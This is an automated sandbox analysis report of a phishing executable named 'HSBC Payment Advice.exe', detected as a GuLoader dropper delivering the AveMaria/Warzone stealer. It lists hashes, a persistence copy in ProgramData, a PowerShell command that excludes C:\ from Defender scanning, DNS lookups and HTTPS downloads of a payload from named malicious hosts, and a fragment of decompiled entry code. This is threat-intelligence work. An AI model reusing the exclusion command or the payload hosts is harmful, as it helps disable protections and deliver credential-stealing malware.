                  Sample file name:HSBC Payment Advice.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 91.8% (good quality ratio 62.6%)
                  • Quality average: 41.9%
                  • Quality standard deviation: 35.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240s for sample files taking high CPU consumption
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  18:50:53 | API Interceptor | 28x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  Match | Associated Sample Name / URL | Detection | Context
                  spuredge.com | HSBC Customer Information.exe | malicious | 164.90.131.131
                  spuredge.com | HSBC Customer Information.exe | malicious | 164.90.131.131
                  spuredge.com | SecuriteInfo.com.W32.AIDetect.malware2.27504.exe | malicious | 164.90.131.131
                  spuredge.com | BENEFICIARY PAYMENT NOTICE.exe | malicious | 164.90.131.131
                  spuredge.com | Invoice-NBM01557.exe | malicious | 164.90.131.131
                  spuredge.com | HSBC Customer Information.exe | malicious | 164.90.131.131
                  spuredge.com | HSBC Payment Advice.exe | malicious | 164.90.131.131
                  spuredge.com | Invoice-NBM01557.exe | malicious | 164.90.131.131

                  ASN

                  Match | Associated Sample Name / URL | Detection | Context
                  FHLB-OFUS | husAc5LfPP | malicious | 38.103.146.9
                  FHLB-OFUS | mips | malicious | 38.103.254.188

                  JA3 Fingerprints

                  Match | Associated Sample Name / URL | Detection | Context
                  37f463bf4616ecd445d4a1937da06e19 | duLT5gkRjy.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | duLT5gkRjy.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | EaCmG75WxF.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | fpvN6iDp5r.msi | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | EaCmG75WxF.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Se adjunta el pedido, proforma.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Statement.html | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Michal November 23, 2021.html | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | survey-1384723731.xls | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Wfedtqxbgeorkwcgiehsnsjbdjghrpjtlr.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | survey-1378794827.xls | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Zr26f1rL6r.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | mN2NobuuDv.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | cs.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | ORDINE + DDT A.M.F SpA.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | mal1.html | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | 5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | DOC5629.htm | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | Racun je u prilogu.exe | malicious | 38.103.244.107
                  37f463bf4616ecd445d4a1937da06e19 | exe.exe | malicious | 38.103.244.107

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\images.exe
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):111776
                  Entropy (8bit):5.9797505021512665
                  Encrypted:false
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  MD5:A069E61B357F625A7B3595150412C42D
                  SHA1:5FA560D04B13DB7E0216BDA2CA5F1C3B94A8912E
                  SHA-256:0FB47A47BC025991B3ED8895AA84030DEF6E5CC538A9CEC279A73F4528D549C6
                  SHA-512:BF5C8D398A219E35048AA096C5C8F6A699EDC8FFB63570AA8678F593DA324421DFA19154A725E84F84AF266320C90A88852328EF666826A750BDC992F4DFF66F
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 56%, Browse
                  • Antivirus: Metadefender, Detection: 20%, Browse
                  • Antivirus: ReversingLabs, Detection: 49%
                  Reputation:low
                  C:\ProgramData\images.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22268
                  Entropy (8bit):5.605280175734106
                  Encrypted:false
                  SSDEEP:384:FtCDqElDmQsq+sYhRYSBKnYjultI2j7Y9gtSJ3x+T1MarZlbAV7W3WDmZBDI+iuC:2s744KYCltZXtc0CSfw6RVW
                  MD5:76A8F16698B242D790634A3A452C6E2B
                  SHA1:99053AB5F93F1FE29FE01A5EA48FE23687FA2DF5
                  SHA-256:FC9861C453F85E3130FE483937FB57C36A30B3508397813C6E81C5F3516307AA
                  SHA-512:B501F13DA22E864C6C6FA463D430ED3520C03167E7DA6468313F5CDDD8BEC09522E5754177E8C1B55CCFB24B64B6B292B102532B0A06FA89D43C45E34EECEE14
                  Malicious:false
                  Reputation:low
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tubbusjo.0kz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\Documents\20211125\PowerShell_transcript.051829.7+5fXBbe.20211125185051.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5072
                  Entropy (8bit):5.382415440050556
                  Encrypted:false
                  SSDEEP:96:BZ646EeN5qqDo1ZwwZ66EeN5qqDo1ZBM6UjZ66EeN5qqDo1ZKFEE8Z3:1KbKOKE
                  MD5:6BFB8157D1151FE07FEA9D44ECA37EDF
                  SHA1:2476FF605738DCEEE7AFBD7F2F59C942AB4D9183
                  SHA-256:E8683A6B7380D857B8F1912F18323981E8A851197DE7F46E8834F53AB5657757
                  SHA-512:6970864B49468B4C1496D6BFE17941AD3A6A3F945C467BF45EBDE56D58D7166E7746E87A08516830F9884DE01C8289AF97ED4FFA1543860386596FDB444969BB
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125185053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125185053..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211125185436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPr

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.9797505021512665
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HSBC Payment Advice.exe
                  File size:111776
                  MD5:a069e61b357f625a7b3595150412c42d
                  SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
                  SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
                  SHA512:bf5c8d398a219e35048aa096c5c8f6a699edc8ffb63570aa8678f593da324421dfa19154a725e84f84af266320c90a88852328ef666826a750bdc992f4dff66f
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@........................

                  File Icon

                  Icon Hash:20047c7c70f0e004

                  Static PE Info

                  General

                  Entrypoint:0x4011a8
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x4BDCF126 [Sun May 2 03:27:34 2010 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:15f2ba1f2bb76fff74223ec60bc62d7d

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 11/24/2021 11:04:33 AM 11/24/2022 11:04:33 AM
                  Subject Chain
                  • E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Version:3
                  Thumbprint MD5:99DF32578053FC972FD1F244233579CA
                  Thumbprint SHA-1:11E3E91B7D7A2135B9E864D5EFEBD574FA821A18
                  Thumbprint SHA-256:2BED8134662C05F42BA8B6FE9C0873AA65E6A2AB13FFFFB2377591D7C09D20FE
                  Serial:00

                  Entrypoint Preview

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18374 | 0x28 | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b000 | 0xa4e | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1a000 | 0x14a0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x220 | 0x20 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xa8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x174d4 | 0x18000 | False | 0.475453694661 | data | 6.08617646952 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data | 0x19000 | 0x1c34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x1b000 | 0xa4e | 0x1000 | False | 0.195068359375 | data | 2.1656784604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  VAV | 0x1b910 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
                  RT_ICON | 0x1b7e0 | 0x130 | data | |
                  RT_ICON | 0x1b4f8 | 0x2e8 | data | |
                  RT_ICON | 0x1b3d0 | 0x128 | GLS_BINARY_LSB_FIRST | |
                  RT_GROUP_ICON | 0x1b3a0 | 0x30 | data | |
                  RT_VERSION | 0x1b1a0 | 0x200 | data | Chinese | Taiwan

                  Imports

                  DLL | Import
                  MSVBVM60.DLL | MethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                  Version Infos

                  Description | Data
                  Translation | 0x0404 0x04b0
                  ProductVersion | 1.00
                  InternalName | Form_HALVGUDB
                  FileVersion | 1.00
                  OriginalFilename | Form_HALVGUDB.exe
                  ProductName | Form_Dikkeror6

                  Possible Origin

                  Language of compilation system | Country where language is spoken
                  English | United States
                  Chinese | Taiwan

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  11/25/21-18:53:02.752720 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60983 | 8.8.8.8 | 192.168.2.7

                  Network Port Distribution

                  TCP Packets


                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Nov 25, 2021 18:50:48.214104891 CET | 52816 | 53 | 192.168.2.7 | 8.8.8.8
                  Nov 25, 2021 18:50:48.326981068 CET | 53 | 52816 | 8.8.8.8 | 192.168.2.7
                  Nov 25, 2021 18:53:00.343080044 CET | 58820 | 53 | 192.168.2.7 | 8.8.8.8
                  Nov 25, 2021 18:53:00.455828905 CET | 53 | 58820 | 8.8.8.8 | 192.168.2.7
                  Nov 25, 2021 18:53:02.707252979 CET | 60983 | 53 | 192.168.2.7 | 8.8.8.8
                  Nov 25, 2021 18:53:02.752720118 CET | 53 | 60983 | 8.8.8.8 | 192.168.2.7

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Nov 25, 2021 18:50:48.214104891 CET | 192.168.2.7 | 8.8.8.8 | 0x4373 | Standard query (0) | spuredge.com | A (IP address) | IN (0x0001)
                  Nov 25, 2021 18:53:00.343080044 CET | 192.168.2.7 | 8.8.8.8 | 0x8081 | Standard query (0) | spuredge.com | A (IP address) | IN (0x0001)
                  Nov 25, 2021 18:53:02.707252979 CET | 192.168.2.7 | 8.8.8.8 | 0x13e6 | Standard query (0) | barr2.ddns.net | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Nov 25, 2021 18:50:48.326981068 CET | 8.8.8.8 | 192.168.2.7 | 0x4373 | No error (0) | spuredge.com | | 38.103.244.107 | A (IP address) | IN (0x0001)
                  Nov 25, 2021 18:53:00.455828905 CET | 8.8.8.8 | 192.168.2.7 | 0x8081 | No error (0) | spuredge.com | | 38.103.244.107 | A (IP address) | IN (0x0001)
                  Nov 25, 2021 18:53:02.752720118 CET | 8.8.8.8 | 192.168.2.7 | 0x13e6 | No error (0) | barr2.ddns.net | | 194.5.97.4 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • spuredge.com

                  HTTPS Proxied Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.7 | 49784 | 38.103.244.107 | 443 | C:\Users\user\Desktop\HSBC Payment Advice.exe

                  Timestamp | kBytes transferred | Direction | Data
                  2021-11-25 17:50:48 UTC | 0 | OUT | GET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:50:49 UTC | 0 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:50:48 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.7 | 49823 | 38.103.244.107 | 443 | C:\Users\user\Desktop\HSBC Payment Advice.exe

                  Timestamp | kBytes transferred | Direction | Data
                  2021-11-25 17:53:00 UTC | 113 | OUT | GET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:53:00 UTC | 113 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:53:00 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream


                  Code Manipulations

                  System Behavior

                  General

                  Start time: 18:48:50
                  Start date: 25/11/2021
                  Path: C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase: 0x400000
                  File size: 111776 bytes
                  MD5 hash: A069E61B357F625A7B3595150412C42D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:18:49:51
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                  Imagebase:0x1110000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff774ee0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:50:51
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 56%, Virustotal, Browse
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 49%, ReversingLabs
                  Reputation:low

                  General

                  Start time:18:51:59
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                    Executed Functions

                    C-Code - Quality: 18%
                    			_entry_(signed char __eax, intOrPtr* __ebx, signed int* __ecx, signed char __edx, intOrPtr* __edi, void* __esi, signed long long __fp0) {
                    				signed char _t444;
                    				signed char _t445;
                    				intOrPtr* _t446;
                    				signed char _t447;
                    				signed char _t448;
                    				signed char _t450;
                    				signed char _t452;
                    				signed char _t453;
                    				signed int _t455;
                    				signed int _t456;
                    				signed int _t457;
                    				signed int _t458;
                    				intOrPtr* _t459;
                    				signed char _t460;
                    				intOrPtr* _t461;
                    				signed int _t462;
                    				signed int _t463;
                    				signed int* _t466;
                    				signed char _t467;
                    				signed char _t468;
                    				signed char _t469;
                    				signed int _t471;
                    				signed int _t472;
                    				signed char _t476;
                    				signed char _t477;
                    				signed int _t478;
                    				signed char _t479;
                    				intOrPtr* _t481;
                    				signed int _t482;
                    				signed int _t483;
                    				signed char _t484;
                    				signed int _t485;
                    				signed int _t486;
                    				signed int _t487;
                    				intOrPtr* _t488;
                    				signed int _t490;
                    				signed int _t491;
                    				signed int _t492;
                    				signed int _t493;
                    				signed int _t494;
                    				signed int _t495;
                    				signed int _t497;
                    				signed char _t499;
                    				signed int _t500;
                    				signed int _t501;
                    				signed int _t502;
                    				signed int _t503;
                    				signed char _t504;
                    				signed int _t506;
                    				signed int _t507;
                    				signed int _t508;
                    				signed int _t509;
                    				signed char _t512;
                    				signed char _t513;
                    				signed int _t514;
                    				signed int _t515;
                    				intOrPtr* _t516;
                    				signed char _t517;
                    				signed char _t518;
                    				signed char _t519;
                    				signed int _t520;
                    				signed int _t521;
                    				intOrPtr* _t522;
                    				signed char _t523;
                    				signed int _t524;
                    				signed char _t525;
                    				intOrPtr* _t527;
                    				intOrPtr* _t528;
                    				signed int _t529;
                    				signed char _t530;
                    				intOrPtr* _t531;
                    				void* _t532;
                    				intOrPtr* _t533;
                    				intOrPtr* _t534;
                    				signed int _t535;
                    				signed int _t536;
                    				signed char _t537;
                    				intOrPtr* _t538;
                    				intOrPtr* _t540;
                    				intOrPtr* _t541;
                    				signed char _t542;
                    				intOrPtr* _t545;
                    				void* _t548;
                    				void* _t549;
                    				void* _t550;
                    				void* _t551;
                    				signed char _t554;
                    				signed char _t559;
